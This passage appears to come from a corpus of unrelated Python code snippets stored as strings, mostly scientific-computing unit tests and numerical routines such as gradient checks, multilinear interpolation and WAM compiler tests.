test022_2d_numerical_comparison_on_fprop_vs_np(\n self,\n batch_size=8,\n num_features=16,\n height=45,\n width=64,\n alpha_fwd=0.99,\n alpha_bkw=0.99,\n itrs=2,\n ):\n # create inputs\n np_inputs = np.random.randn(batch_size, num_features, height, width) + .25\n\n self.template_numerical_comparison_on_vs_np(\n np_inputs,\n np_grad_out=None,\n axis=1,\n alpha_fwd=alpha_fwd,\n alpha_bkw=alpha_bkw,\n itrs=itrs,\n )", "def test_elemwise4():\r\n\r\n shape = (3, 4)\r\n a = 
tcn.shared_constructor(theano._asarray(numpy.random.rand(*shape),\r\n dtype='float32'), 'a')\r\n b = tensor.fvector()\r\n c = tensor.fvector()\r\n f = pfunc([b, c], [],\r\n updates=[(a, (a + b.dimshuffle('x', 0) * c.dimshuffle(0, 'x')))],\r\n mode=mode_with_gpu)\r\n has_elemwise = False\r\n for i, node in enumerate(f.maker.fgraph.toposort()):\r\n has_elemwise = has_elemwise or isinstance(node.op, tensor.Elemwise)\r\n assert not has_elemwise\r\n #let debugmode catch errors\r\n f(theano._asarray(numpy.random.rand(4), dtype='float32'),\r\n theano._asarray(numpy.random.rand(3), dtype='float32'))", "def test_generate_condition_function():\n masks = 4 # Always > 2\n vals = 15\n np_masks = np.random.randint(2, size=(masks, vals), dtype=bool)\n tf_masks = [tf.constant(i, dtype=tf.bool) for i in np_masks]\n # Generate the functions for and and or\n f_and = generate_condition_function(masks, \"and\")\n f_or = generate_condition_function(masks, \"or\")\n # Get the numpy and tf results\n np_ands = np.all(np_masks, axis=0)\n np_ors = np.any(np_masks, axis=0)\n tf_ands, idx_ands = f_and(*tf_masks)\n tf_ors, idx_ors = f_or(*tf_masks)\n # Check the values are the same\n util_check(np_ands, tf_ands, idx_ands)\n util_check(np_ors, tf_ors, idx_ors)\n # Check a combination\n f_comb = generate_condition_function(3, [\"and\", \"or\"])\n np_comb = np_masks[0] & np_masks[1] | np_masks[2]\n tf_comb, idx_comb = f_comb(*tf_masks[:3])\n util_check(np_comb, tf_comb, idx_comb)\n # Check failures\n with pytest.raises(ValueError):\n generate_condition_function(1, \"and\")\n with pytest.raises(ValueError):\n generate_condition_function(5, \"bad_condition\")\n with pytest.raises(ValueError):\n generate_condition_function(5, [\"or\", \"and\"])\n with pytest.raises(ValueError):\n generate_condition_function(3, [\"or\", \"bad_condition\"])", "def test_quad_flush_ind(self):", "def test_SMEB_args():\n testing_function('sme_bl', bilinear=True)", "def test_advanced_manipulations(free_alg):\n dr = free_alg\n p = dr.names\n i, j, k = p.i, p.j, p.k\n\n u = IndexedBase('u')\n v = IndexedBase('v')\n f = Vec('f')\n\n tensor = dr.einst(u[i, j] * f[j] + v[i, j] * f[j])\n assert tensor.n_terms == 2\n\n def has_u(term):\n \"\"\"Test if a term have u tensor.\"\"\"\n return term.amp.has(u)\n\n expect = dr.sum((j, p.R), u[i, j] * f[j])\n for res in [\n tensor.filter(has_u),\n tensor.bind(lambda x: [x] if has_u(x) else [])\n ]:\n assert res.n_terms == 1\n assert res == expect\n\n def subst_i(term):\n \"\"\"Substitute i index in the terms.\"\"\"\n return Term(term.sums, term.amp.xreplace({i: k}), term.vecs)\n\n expect = dr.sum((j, p.R), u[k, j] * f[j] + v[k, j] * f[j])\n for res in [\n tensor.map(subst_i),\n tensor.bind(lambda x: [subst_i(x)]),\n tensor.map2scalars(lambda x: x.xreplace({i: k}))\n ]:\n assert res.n_terms == 2\n assert res == expect\n\n alpha, beta = symbols('alpha beta')\n assert tensor.bind(\n lambda x: [Term(x.sums, x.amp * i_, x.vecs) for i_ in [alpha, beta]]\n ) == (tensor * alpha + tensor * beta)\n\n assert tensor.map2scalars(\n lambda x: x.xreplace({j: k})\n ) == dr.sum((j, p.R), u[i, k] * f[k] + v[i, k] * f[k])\n\n assert tensor.map2scalars(\n lambda x: x.xreplace({j: k}), skip_vecs=True\n ) == dr.sum((j, p.R), u[i, k] * f[j] + v[i, k] * f[j])", "def test_SMEL_args():\n testing_function('sme', bilinear=False)", "def test_sum_pos_4() -> None:\n # Third step, 4th square.\n assert nth(sw.sum_walk(), 2) == 4", "def test_add_op_jit():\n x = np.array([1, 2, 3, 4, 5, 6, 7])\n paddle_x = paddle.to_tensor(x).astype(\"float32\")\n 
paddle_x.stop_gradient = False\n print(paddle_x)\n a = 1\n b = 5\n out = custom_ops.slice_test(paddle_x, a, b)\n print(\"out: \", out)\n print(\"numpy out: \", x[a:b])\n assert np.allclose(out.numpy(), x[a:b])\n print(\"run success\")", "def inter_op_dp_inner_loop(\n n_layers, n_devices, submesh_sizes, valid_idxs_costs, max_n_succ_stages\n):\n F = np.full((n_layers + 1, n_layers + 1, n_devices + 1), np.inf, dtype=np.float32)\n F_stage_max = np.full(\n (n_layers + 1, n_layers + 1, n_devices + 1), 0.0, dtype=np.float32\n )\n F_argmin = np.full(\n (n_layers + 1, n_layers + 1, n_devices + 1, 3), -1, dtype=np.int32\n )\n F[0, n_layers, 0] = 0\n\n for d in range(1, n_devices + 1):\n for (\n l,\n i,\n submesh_shape_idx,\n sharding_config_idx,\n stage_cost,\n ) in valid_idxs_costs:\n l, i, submesh_shape_idx, sharding_config_idx = map(\n int, (l, i, submesh_shape_idx, sharding_config_idx)\n )\n\n n_submesh_devices = submesh_sizes[submesh_shape_idx]\n if n_submesh_devices <= d:\n for s in range(1, n_layers + 1):\n if (\n s - 1\n > max_n_succ_stages[\n l, i, submesh_shape_idx, sharding_config_idx\n ]\n ):\n continue\n\n new_cost = F[s - 1, i + 1, d - n_submesh_devices] + stage_cost\n if new_cost < F[s, l, d]:\n F[s, l, d] = new_cost\n F_argmin[s, l, d] = (\n i + 1,\n submesh_shape_idx,\n sharding_config_idx,\n )\n F_stage_max[s, l, d] = max(\n F_stage_max[s - 1, i + 1, d - n_submesh_devices], stage_cost\n )\n\n return F, F_stage_max, F_argmin", "def test():\n Z = func.evaluate_circuit(F, e_x, e_y, e_xor)\n if Z == d[0]:\n return 0\n elif Z == d[1]:\n return 1", "def test_positional_convolution_backward():\n i = 1\n for num_batch in [1, 2, 4]:\n for num_channel in [4, 8, 12]:\n for input_height, input_width in itertools.product([10, 12, 18], [10, 12, 18]):\n for num_filter in [2, 4, 8]:\n for kernel in [(3, 3), (2, 2)]:\n for stride in [(1, 1), (2, 2)]:\n for pad in [(0, 0), (1, 1)]:\n for dilate in [(1, 1), (2, 2)]:\n # for num_group in [1, 2, 4]:\n grad_nodes = ['im_data', 'scale_data', 'weight', 'bias']\n output_height = np.floor(\n (input_height + 2 * pad[0] - dilate[0] * (kernel[0] - 1) - 1) * 1.0 / stride[0]\n ) + 1\n output_width = np.floor(\n (input_width + 2 * pad[1] - dilate[1] * (kernel[1] - 1) - 1) * 1.0 / stride[1]\n ) + 1\n im_data = np.random.rand(num_batch, num_channel, input_height, input_width)\n scale_data = \\\n np.random.rand(num_batch, num_channel, int(output_height), int(output_width))\\\n * 0.8 + 0.1\n\n weight = np.random.normal(0, 0.001, (num_filter, num_channel, kernel[0], kernel[1]))\n bias = np.random.rand(num_filter)\n\n im_data_var = mx.symbol.Variable(name=\"im_data\")\n scale_data_var = mx.symbol.Variable(name=\"scale_data\")\n weight_var = mx.symbol.Variable(name=\"weight\")\n bias_var = mx.symbol.Variable(name=\"bias\")\n op = mx.sym.contrib.PositionalConvolution(name='test_op',\n data=im_data_var,\n scale=scale_data_var,\n weight=weight_var,\n bias=bias_var,\n num_filter=num_filter,\n kernel=kernel, stride=stride, pad=pad,\n dilate=dilate\n )\n rtol, atol = 1e-4, 1e-3\n # absolute(a - b) <= (atol + rtol * absolute(b))\n check_numeric_gradient(op, [im_data, scale_data, weight, bias], rtol=rtol,\n atol=atol, grad_nodes=grad_nodes, ctx=mx.gpu(0))\n print(\"check numeric gradient successfully for the {} times\".format(i))\n i += 1", "def f_unc(xpts, offset, *params):\n res = 0\n for i, p in enumerate(coefficients):\n res += p*xpts**i\n return res", "def _evaluate(self, w, x, y, z):\n if _isscalar(x):\n y_pos = max(min(np.searchsorted(self.y_list, y), self.y_n - 1), 1)\n 
z_pos = max(min(np.searchsorted(self.z_list, z), self.z_n - 1), 1)\n alpha = (y - self.y_list[y_pos - 1]) / (\n self.y_list[y_pos] - self.y_list[y_pos - 1]\n )\n beta = (z - self.z_list[z_pos - 1]) / (\n self.z_list[z_pos] - self.z_list[z_pos - 1]\n )\n f = (\n (1 - alpha)\n * (1 - beta)\n * self.wxInterpolators[y_pos - 1][z_pos - 1](w, x)\n + (1 - alpha) * beta * self.wxInterpolators[y_pos - 1][z_pos](w, x)\n + alpha * (1 - beta) * self.wxInterpolators[y_pos][z_pos - 1](w, x)\n + alpha * beta * self.wxInterpolators[y_pos][z_pos](w, x)\n )\n else:\n m = len(x)\n y_pos = np.searchsorted(self.y_list, y)\n y_pos[y_pos > self.y_n - 1] = self.y_n - 1\n y_pos[y_pos < 1] = 1\n z_pos = np.searchsorted(self.z_list, z)\n z_pos[z_pos > self.z_n - 1] = self.z_n - 1\n z_pos[z_pos < 1] = 1\n f = np.zeros(m) + np.nan\n for i in range(1, self.y_n):\n for j in range(1, self.z_n):\n c = np.logical_and(i == y_pos, j == z_pos)\n if np.any(c):\n alpha = (y[c] - self.y_list[i - 1]) / (\n self.y_list[i] - self.y_list[i - 1]\n )\n beta = (z[c] - self.z_list[j - 1]) / (\n self.z_list[j] - self.z_list[j - 1]\n )\n f[c] = (\n (1 - alpha)\n * (1 - beta)\n * self.wxInterpolators[i - 1][j - 1](w[c], x[c])\n + (1 - alpha)\n * beta\n * self.wxInterpolators[i - 1][j](w[c], x[c])\n + alpha\n * (1 - beta)\n * self.wxInterpolators[i][j - 1](w[c], x[c])\n + alpha * beta * self.wxInterpolators[i][j](w[c], x[c])\n )\n return f", "def test_grad_binary(func, motion, optimized, preserve_result, a, b):\n utils.test_reverse_array(func, motion, optimized, preserve_result, a, b)", "def CalcGreenFunctions(x, y, z, x_src_l, y_src_l, alpha, dire, Lambda_y, \\\n gamma_l, c, omega, G_sen, dir_meas, dir_meas_deg, airloss_alpha, f, n):\n \n G = greens_fct(repmat(x_src_l, np.shape(x)[0],1), repmat(y_src_l, np.shape(y)[0],1), omega, c, \\\n np.transpose(repmat(x, np.shape(x_src_l)[0], 1)), np.transpose(repmat(y, np.shape(y_src_l)[0], 1)), z)\n\n G = G_sen * G\n \n beta = np.arcsin((np.transpose(repmat(y, np.shape(y_src_l)[0], 1)) - repmat(y_src_l, np.shape(y)[0], 1)) \\\n * np.sqrt((np.transpose(repmat(x, np.shape(x_src_l)[0], 1)) - \\\n repmat(x_src_l, np.shape(x)[0], 1))**2 + \\\n (np.transpose(repmat(y, np.shape(y_src_l)[0], 1)) - repmat(y_src_l, np.shape(y)[0], 1))**2)**(-1)) \\\n + repmat(gamma_l, np.shape(x)[0], 1)\n \n # air attenuation\n src_rec_dist = np.sqrt((np.transpose(repmat(x, np.shape(x_src_l)[0], 1)) - repmat(x_src_l, np.shape(x)[0], 1))**2 \\\n + (np.transpose(repmat(y, np.shape(y_src_l)[0], 1)) - repmat(y_src_l, np.shape(y)[0], 1))**2)\n \n air_att = airloss_alpha * src_rec_dist\n air_att = 10**(-air_att / 20)\n G = G * air_att\n \n H_post = calc_directivity(dire, alpha, Lambda_y, beta, omega, c, f, dir_meas, dir_meas_deg, n)\n\n G = G * H_post\n \n return G", "def border_function_generator(self, stencil):\n\n def is_on_border(indice):\n for i in range(self.dim):\n if indice[0] < stencil.b[0][0] or indice[0] >= self.mid.shape[0]+stencil.b[0][0]:\n return True\n return is_on_border", "def structure_function(f, index=0):\r\n\r\n def structured_function(*args):\r\n pattern = args[index]\r\n evaluated = f(*args)\r\n evaluated[pattern == 0] = 0\r\n return evaluated\r\n return structured_function", "def test_lifted_index():\n pressure = np.array([1014., 1000., 997., 981.2, 947.4, 925., 914.9, 911.,\n 902., 883., 850., 822.3, 816., 807., 793.2, 770.,\n 765.1, 753., 737.5, 737., 713., 700., 688., 685.,\n 680., 666., 659.8, 653., 643., 634., 615., 611.8,\n 566.2, 516., 500., 487., 484.2, 481., 475., 460.,\n 400.]) * units.hPa\n 
temperature = np.array([24.2, 24.2, 24., 23.1, 21., 19.6, 18.7, 18.4,\n 19.2, 19.4, 17.2, 15.3, 14.8, 14.4, 13.4, 11.6,\n 11.1, 10., 8.8, 8.8, 8.2, 7., 5.6, 5.6,\n 5.6, 4.4, 3.8, 3.2, 3., 3.2, 1.8, 1.5,\n -3.4, -9.3, -11.3, -13.1, -13.1, -13.1, -13.7, -15.1,\n -23.5]) * units.degC\n dewpoint = np.array([23.2, 23.1, 22.8, 22., 20.2, 19., 17.6, 17.,\n 16.8, 15.5, 14., 11.7, 11.2, 8.4, 7., 4.6,\n 5., 6., 4.2, 4.1, -1.8, -2., -1.4, -0.4,\n -3.4, -5.6, -4.3, -2.8, -7., -25.8, -31.2, -31.4,\n -34.1, -37.3, -32.3, -34.1, -37.3, -41.1, -37.7, -58.1,\n -57.5]) * units.degC\n parcel_prof = parcel_profile(pressure, temperature[0], dewpoint[0])\n li = lifted_index(pressure, temperature, parcel_prof)\n assert_almost_equal(li, -7.9115691 * units.delta_degree_Celsius, 2)", "def structure_function(f, index=0):\n\n def structured_function(*args):\n pattern = args[index]\n evaluated = f(*args)\n evaluated[pattern == 0] = 0\n return evaluated\n\n return structured_function", "def pyelemfunctions():\n for elemid in unique(top.idpyelem[:top.nppyelem]):\n ip = (top.idpyelem[:top.nppyelem] == elemid)\n x = top.xpyelem[:top.nppyelem][ip]\n y = top.ypyelem[:top.nppyelem][ip]\n z = top.zpyelem[:top.nppyelem][ip]\n # --- The conversion to int is needed since a numpy.int64 is different than an int.\n (ex,ey,ez,bx,by,bz) = pyelemfunctionsdict[int(elemid)](x,y,z)\n top.expyelem[:top.nppyelem][ip] = ex\n top.eypyelem[:top.nppyelem][ip] = ey\n top.ezpyelem[:top.nppyelem][ip] = ez\n top.bxpyelem[:top.nppyelem][ip] = bx\n top.bypyelem[:top.nppyelem][ip] = by\n top.bzpyelem[:top.nppyelem][ip] = bz", "def test042_2d_numerical_comparison_on_fprop_vs_np_mp(\n self,\n batch_size=8,\n num_features=16,\n height=45,\n width=64,\n alpha_fwd=0.99,\n alpha_bkw=0.99,\n itrs=2,\n ):\n # create inputs\n np_inputs = np.random.randn(batch_size, num_features, height, width) + .25\n\n tf.keras.backend.set_floatx('float16')\n\n self.template_numerical_comparison_on_vs_np(\n np_inputs,\n np_grad_out=None,\n axis=1,\n alpha_fwd=alpha_fwd,\n alpha_bkw=alpha_bkw,\n itrs=itrs,\n dtype=Policy('infer_float32_vars'),\n )", "def past_weight_grad_calculator2(xs, es, kp_x, kd_x, kp_e, kd_e, shapes):\n kp_x, kd_x, kp_e, kd_e = [as_floatx(k) for k in (kp_x, kd_x, kp_e, kd_e)]\n n_samples, n_in, n_out = shapes\n rx = kd_x/(kp_x+kd_x)\n re = kd_e/(kp_e+kd_e)\n\n xr = create_shared_variable(np.zeros((n_samples, n_in)))\n er = create_shared_variable(np.zeros((n_samples, n_out)))\n\n\n\n\n # xr_new = xr*rx + xs/(kp_x+kd_x)\n # er_new = er*re + es/(kp_e+kd_e)\n\n arr = rx*re/(1-rx*re)\n\n xr_new = xr*arr + xs/(kp_x+kd_x)\n er_new = er*arr + es/(kp_e+kd_e)\n\n xsum = create_shared_variable(np.zeros((n_samples, n_in)))\n esum = create_shared_variable(np.zeros((n_samples, n_out)))\n\n xsum_new = xsum+xr_new\n esum_new = esum+er_new\n\n x_nospikes = tt.eq(xs, 0)\n e_nospikes = tt.eq(es, 0)\n\n dw = xs.T.dot(esum_new) + xsum_new.T.dot(es)\n\n add_update(xr, xr_new)\n add_update(er, er_new)\n add_update(xsum, xsum_new*x_nospikes)\n add_update(esum, esum_new*e_nospikes)\n\n return xs.T.dot(er) + xr.T.dot(es)\n # return xr.T.dot(er)\n # return dw", "def test_cspad_xy_at_z():\n ## 'CxiDs1.0:Cspad.0)' or 'DscCsPad'\n basedir = '/reg/g/psdm/detector/alignment/cspad/calib-cxi-camera1-2014-09-24/'\n fname_geometry = basedir + '2016-06-03-geometry-cxi06216-r25-camera1-z175mm.txt'\n fname_data = basedir + '2016-06-03-chun-cxi06216-0025-DscCsPad-max.txt'\n\n geometry = GeometryAccess(fname_geometry, pbits=0o377)\n\n # get pixel coordinate index arrays:\n xyc = xc, yc = 1000, 
1000\n #rows, cols = geometry.get_pixel_coord_indexes(xy0_off_pix=xyc)\n #rows, cols = geometry.get_pixel_coord_indexes(do_tilt=True)\n #rows, cols = geometry.get_pixel_xy_inds_at_z(zplane=None, xy0_off_pix=xyc)\n rows, cols = geometry.get_pixel_xy_inds_at_z(zplane=150000)\n\n root, ext = os.path.splitext(fname_data)\n arr = np.load(fname_data) if ext == '.npy' else np.loadtxt(fname_data, dtype=np.float)\n\n #logger.info('arr.shape=', arr.shape\n arr.shape= (32,185,388)\n\n #ave, rms = arr.mean(), arr.std()\n #amp_range = (ave-rms, ave+3*rms)\n amp_range = (0, 1000)\n logger.info('amp_range:' + str(amp_range))\n\n logger.info('shapes rows: %s cols: %s weight: %s' % (str(rows.shape), str(cols.shape), str(arr.shape)))\n img = img_from_pixel_arrays(rows,cols,W=arr)\n\n axim = gg.plotImageLarge(img,amp_range=amp_range)\n gg.move(500,10)\n gg.show()", "def test0521_2d_numerical_comparison_on_vs_np_batchsize1_mp(\n self,\n batch_size=1,\n num_features=16,\n height=45,\n width=64,\n alpha_fwd=0.99,\n alpha_bkw=0.99,\n itrs=16,\n ):\n # create inputs\n np_inputs = np.random.randn(batch_size, num_features, height, width) + .25\n # instantiate gradient at the output\n np_grad_out = np.random.randn(batch_size, num_features, height, width) + .125\n\n tf.keras.backend.set_floatx('float16')\n\n self.template_numerical_comparison_on_vs_np(\n np_inputs,\n np_grad_out=np_grad_out,\n axis=1,\n alpha_fwd=alpha_fwd,\n alpha_bkw=alpha_bkw,\n itrs=itrs,\n dtype=Policy('infer_float32_vars'),\n )", "def test_window_funcs():\n # get a PSpecData\n uvd = UVData()\n uvd.read_miriad(\n os.path.join(DATA_PATH, 'zen.even.xx.LST.1.28828.uvOCRSA'),\n use_future_array_shapes=True\n )\n beam = pspecbeam.PSpecBeamUV(os.path.join(DATA_PATH, \"HERA_NF_dipole_power.beamfits\"))\n ds = pspecdata.PSpecData(dsets=[copy.deepcopy(uvd)], beam=beam)\n ds.set_spw((0, 20))\n ds.set_taper('bh')\n bl = (37, 38)\n key = (0, bl, 'xx')\n d = uvd.get_data(bl)\n C = np.cov(d[:, :20].T).real\n iC = np.linalg.pinv(C)\n # iterate over various R and M matrices and ensure\n # normalization and dtype is consistent\n for data_weight in ['identity', 'iC']:\n ds.set_weighting(data_weight)\n for norm in ['H^-1', 'I', 'V^-1/2']:\n for exact_norm in [True, False]:\n if exact_norm and norm != 'I':\n # exact_norm only supported for norm == 'I'\n continue\n ds.clear_cache()\n if data_weight == 'iC':\n # fill R with iC\n ds._R[(0, (37, 38, 'xx'), 'iC', 'bh')] = iC\n # compute G and H\n Gv = ds.get_G(key, key, exact_norm=exact_norm, pol='xx')\n Hv = ds.get_H(key, key, exact_norm=exact_norm, pol='xx')\n Mv, Wv = ds.get_MW(Gv, Hv, mode=norm, exact_norm=exact_norm,\n band_covar=C)\n # assert row-sum is normalized to 1\n assert np.isclose(Wv.sum(axis=1).real, 1).all()\n # assert this is a real matrix, even though imag is populated\n assert np.isclose(Wv.imag, 0, atol=1e-6).all()", "def test_fortran_frontend_view_test():\n test_name = \"view_test\"\n test_string = \"\"\"\n PROGRAM \"\"\" + test_name + \"\"\"_program\nimplicit none\ndouble precision a(10,11,12)\ndouble precision res(1,1,2) \n\nCALL \"\"\" + test_name + \"\"\"_function(a,res)\n\nend\n\nSUBROUTINE \"\"\" + test_name + \"\"\"_function(aa,res)\n\ndouble precision aa(10,11,12)\ndouble precision res(1,1,2) \n\ncall viewlens(aa(:,:,1),res)\n\nend SUBROUTINE \"\"\" + test_name + \"\"\"_function\n\nSUBROUTINE viewlens(aa,res)\n\nIMPLICIT NONE\n\ndouble precision :: aa(10,11,23) \ndouble precision :: res(1,1,2)\n\nINTEGER :: JK, JL\n\nres(1,1,1)=0.0\nDO JK=1,10\n DO JL=1,11\n res(1,1,1)=res(1,1,1)+aa(JK,JL)\n 
ENDDO\nENDDO\naa(1,1)=res(1,1,1)\n\n\nEND SUBROUTINE viewlens\n \"\"\"\n sdfg = fortran_parser.create_sdfg_from_string(test_string, test_name)\n sdfg.simplify(verbose=True)\n a = np.full([10, 11, 12], 42, order=\"F\", dtype=np.float64)\n b = np.full([1, 1, 2], 42, order=\"F\", dtype=np.float64)\n b[0, 0, 0] = 1\n sdfg(aa=a, res=b)\n assert (a[0, 0, 1] == 42)\n assert (a[0, 0, 0] == 4620)\n assert (b[0, 0, 0] == 4620)", "def test_offsets():\n B = 100\n H = 20\n E = 210000\n sections = ((B, H, 0, E),)\n sections2 = ((B, H, 12.435, E),)\n EI, top, bot = bm.EI(sections, E)\n EI2, top2, bot2 = bm.EI(sections2, E)\n assert 0.99 < EI / EI2 < 1.01\n assert 0.99 < top / top2 < 1.01\n assert 0.99 < bot / bot2 < 1.01", "def test_special_XYX(self, angexp):\n a, b, c, d = angexp[0]\n exp = {(\"rx\", \"ry\")[g]: angexp[1][g] for g in (0, 1) if angexp[1][g]}\n tgt = np.exp(1j * d) * RXGate(b).to_matrix() @ RYGate(a).to_matrix() @ RXGate(c).to_matrix()\n self.check_oneq_special_cases(tgt, \"XYX\", exp)", "def test_ex_2_5(self):\n\n compiler = Compiler()\n\n X = Variable()\n Y = Variable()\n query = Compound('p', Compound('f', X), Compound('h', Y, Compound('f', Atom('a'))), Y)\n query_reg_allocation = RegisterAllocation()\n query_instrs = compiler.compile_query(query, query_reg_allocation)\n\n W = Variable()\n Z = Variable()\n program = Compound('p', Z, Compound('h', Z, W), Compound('f', W))\n program_reg_allocation = RegisterAllocation()\n program_instrs = compiler.compile_program(program, program_reg_allocation)\n\n wam = WAM()\n wam.execute(query_instrs)\n wam.execute(program_instrs)\n aW = wam.deref_reg(program_reg_allocation[W])\n aX = wam.deref_reg(query_reg_allocation[X])\n aY = wam.deref_reg(query_reg_allocation[Y])\n aZ = wam.deref_reg(program_reg_allocation[Z])\n self.assertEqual(wam.get_term_repr(aW), 'f(a)')\n self.assertEqual(wam.get_term_repr(aX), 'f(a)')\n self.assertEqual(wam.get_term_repr(aY), 'f(f(a))')\n self.assertEqual(wam.get_term_repr(aZ), 'f(f(a))')", "def test_make_efuncs(exprs, nfuncs, ntimeiters, nests):\n exprs = list(as_tuple(exprs))\n\n grid = Grid(shape=(10, 10))\n t = grid.stepping_dim # noqa\n x, y = grid.dimensions # noqa\n\n u = Function(name='u', grid=grid) # noqa\n v = TimeFunction(name='v', grid=grid) # noqa\n\n # List comprehension would need explicit locals/globals mappings to eval\n for i, e in enumerate(list(exprs)):\n exprs[i] = eval(e)\n\n op = Operator(exprs)\n\n # We create one ElementalFunction for each Iteration nest over space dimensions\n efuncs = []\n for n, tree in enumerate(retrieve_iteration_tree(op)):\n root = filter_iterations(tree, key=lambda i: i.dim.is_Space)[0]\n efuncs.append(make_efunc('f%d' % n, root))\n\n assert len(efuncs) == len(nfuncs) == len(ntimeiters) == len(nests)\n\n for efunc, nf, nt, nest in zip(efuncs, nfuncs, ntimeiters, nests):\n # Check the `efunc` parameters\n assert all(i in efunc.parameters for i in (x.symbolic_min, x.symbolic_max))\n assert all(i in efunc.parameters for i in (y.symbolic_min, y.symbolic_max))\n functions = FindSymbols().visit(efunc)\n assert len(functions) == nf\n assert all(i in efunc.parameters for i in functions)\n timeiters = [i for i in FindSymbols('basics').visit(efunc)\n if isinstance(i, Dimension) and i.is_Time]\n assert len(timeiters) == nt\n assert all(i in efunc.parameters for i in timeiters)\n assert len(efunc.parameters) == 4 + len(functions) + len(timeiters)\n\n # Check the loop nest structure\n trees = retrieve_iteration_tree(efunc)\n assert len(trees) == 1\n tree = trees[0]\n assert 
all(i.dim.name == j for i, j in zip(tree, nest))\n\n assert efunc.make_call()", "def _evaluate(self, w, x, y, z):\n if _isscalar(w):\n x_pos = max(min(np.searchsorted(self.x_list, x), self.x_n - 1), 1)\n y_pos = max(min(np.searchsorted(self.y_list, y), self.y_n - 1), 1)\n z_pos = max(min(np.searchsorted(self.z_list, z), self.z_n - 1), 1)\n alpha = (x - self.x_list[x_pos - 1]) / (\n self.x_list[x_pos] - self.x_list[x_pos - 1]\n )\n beta = (y - self.y_list[y_pos - 1]) / (\n self.y_list[y_pos] - self.y_list[y_pos - 1]\n )\n gamma = (z - self.z_list[z_pos - 1]) / (\n self.z_list[z_pos] - self.z_list[z_pos - 1]\n )\n f = (\n (1 - alpha)\n * (1 - beta)\n * (1 - gamma)\n * self.wInterpolators[x_pos - 1][y_pos - 1][z_pos - 1](w)\n + (1 - alpha)\n * (1 - beta)\n * gamma\n * self.wInterpolators[x_pos - 1][y_pos - 1][z_pos](w)\n + (1 - alpha)\n * beta\n * (1 - gamma)\n * self.wInterpolators[x_pos - 1][y_pos][z_pos - 1](w)\n + (1 - alpha)\n * beta\n * gamma\n * self.wInterpolators[x_pos - 1][y_pos][z_pos](w)\n + alpha\n * (1 - beta)\n * (1 - gamma)\n * self.wInterpolators[x_pos][y_pos - 1][z_pos - 1](w)\n + alpha\n * (1 - beta)\n * gamma\n * self.wInterpolators[x_pos][y_pos - 1][z_pos](w)\n + alpha\n * beta\n * (1 - gamma)\n * self.wInterpolators[x_pos][y_pos][z_pos - 1](w)\n + alpha * beta * gamma * self.wInterpolators[x_pos][y_pos][z_pos](w)\n )\n else:\n m = len(x)\n x_pos = np.searchsorted(self.x_list, x)\n x_pos[x_pos > self.x_n - 1] = self.x_n - 1\n y_pos = np.searchsorted(self.y_list, y)\n y_pos[y_pos > self.y_n - 1] = self.y_n - 1\n y_pos[y_pos < 1] = 1\n z_pos = np.searchsorted(self.z_list, z)\n z_pos[z_pos > self.z_n - 1] = self.z_n - 1\n z_pos[z_pos < 1] = 1\n f = np.zeros(m) + np.nan\n for i in range(1, self.x_n):\n for j in range(1, self.y_n):\n for k in range(1, self.z_n):\n c = np.logical_and(\n np.logical_and(i == x_pos, j == y_pos), k == z_pos\n )\n if np.any(c):\n alpha = (x[c] - self.x_list[i - 1]) / (\n self.x_list[i] - self.x_list[i - 1]\n )\n beta = (y[c] - self.y_list[j - 1]) / (\n self.y_list[j] - self.y_list[j - 1]\n )\n gamma = (z[c] - self.z_list[k - 1]) / (\n self.z_list[k] - self.z_list[k - 1]\n )\n f[c] = (\n (1 - alpha)\n * (1 - beta)\n * (1 - gamma)\n * self.wInterpolators[i - 1][j - 1][k - 1](w[c])\n + (1 - alpha)\n * (1 - beta)\n * gamma\n * self.wInterpolators[i - 1][j - 1][k](w[c])\n + (1 - alpha)\n * beta\n * (1 - gamma)\n * self.wInterpolators[i - 1][j][k - 1](w[c])\n + (1 - alpha)\n * beta\n * gamma\n * self.wInterpolators[i - 1][j][k](w[c])\n + alpha\n * (1 - beta)\n * (1 - gamma)\n * self.wInterpolators[i][j - 1][k - 1](w[c])\n + alpha\n * (1 - beta)\n * gamma\n * self.wInterpolators[i][j - 1][k](w[c])\n + alpha\n * beta\n * (1 - gamma)\n * self.wInterpolators[i][j][k - 1](w[c])\n + alpha\n * beta\n * gamma\n * self.wInterpolators[i][j][k](w[c])\n )\n return f", "def test_coord_preceding_fs(self):", "def TestFunc1(x):\r\n return 12*x[0]*x[0] + 4*x[1]*x[1] - 12*x[0]*x[1] + 2*x[1]", "def test_ex_2_9(self):\n\n compiler = Compiler()\n\n X = Variable()\n Y = Variable()\n query = Compound('p', Compound('f', X), Compound('h', Y, Compound('f', Atom('a'))), Y)\n query_reg_allocation = RegisterAllocation()\n query_instrs = compiler.compile_query_m1(query, query_reg_allocation)\n\n W = Variable()\n Z = Variable()\n program = Compound('p', Z, Compound('h', Z, W), Compound('f', W))\n # Because there is a shared register space, we reuse the query's register allocation to\n # force the program's registers into different slots.\n program_reg_allocation = query_reg_allocation 
# RegisterAllocation()\n program_instrs = compiler.compile_program_m1(program, program_reg_allocation)\n program_instrs = program_instrs[:-1] # last instruction is proceed; remove it\n\n wam = WAM()\n wam.load(None, query_instrs)\n wam.load(program.get_functor(), program_instrs)\n wam.run()\n\n aW = wam.deref_reg(program_reg_allocation[W])\n aX = wam.deref_reg(query_reg_allocation[X])\n aY = wam.deref_reg(query_reg_allocation[Y])\n aZ = wam.deref_reg(program_reg_allocation[Z])\n\n #print 'X reg:', query_reg_allocation.reg_allocation[X], 'X addr:', aX, 'X: ', wam.get_term_repr(aX)\n #print 'Y reg:', query_reg_allocation.reg_allocation[Y], 'Y addr:', aY, 'Y: ', wam.get_term_repr(aY)\n #print 'Z reg:', program_reg_allocation.reg_allocation[Z], 'Z addr:', aZ, 'Z: ', wam.get_term_repr(aZ)\n #print 'W reg:', program_reg_allocation.reg_allocation[W], 'W addr:', aW, 'W: ', wam.get_term_repr(aW)\n self.assertEqual(wam.get_term_repr(aW), 'f(a)')\n self.assertEqual(wam.get_term_repr(aX), 'f(a)')\n self.assertEqual(wam.get_term_repr(aY), 'f(f(a))')\n self.assertEqual(wam.get_term_repr(aZ), 'f(f(a))')", "def apply_symm_elems_to_index_xyz(symm_elems, index_xyz, points_abc):\n b_n_1, b_n_2, b_n_3 = symm_elems[0], symm_elems[1], symm_elems[2]\n b_d = symm_elems[3]\n r_11, r_12, r_13 = symm_elems[4], symm_elems[5], symm_elems[6]\n r_21, r_22, r_23 = symm_elems[7], symm_elems[8], symm_elems[9]\n r_31, r_32, r_33 = symm_elems[10], symm_elems[11], symm_elems[12]\n i_1, i_2, i_3 = index_xyz[0], 